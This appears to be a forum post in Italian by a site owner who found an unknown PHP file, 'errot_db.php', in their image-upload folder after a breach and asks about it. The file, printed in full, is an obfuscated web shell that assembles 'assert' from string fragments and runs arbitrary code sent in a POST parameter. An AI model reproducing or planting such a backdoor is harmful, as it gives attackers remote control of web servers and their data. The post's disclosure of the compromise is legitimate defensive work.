Recentemente ho scoperto che il mio progetto è stato violato e ho trovato uno script nella mia cartella di immagini che contiene una directory per l'utente per caricare le loro immagini (usando l'input del file). Ecco lo script che ho trovato nella directory.
errot_db.php
<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
?>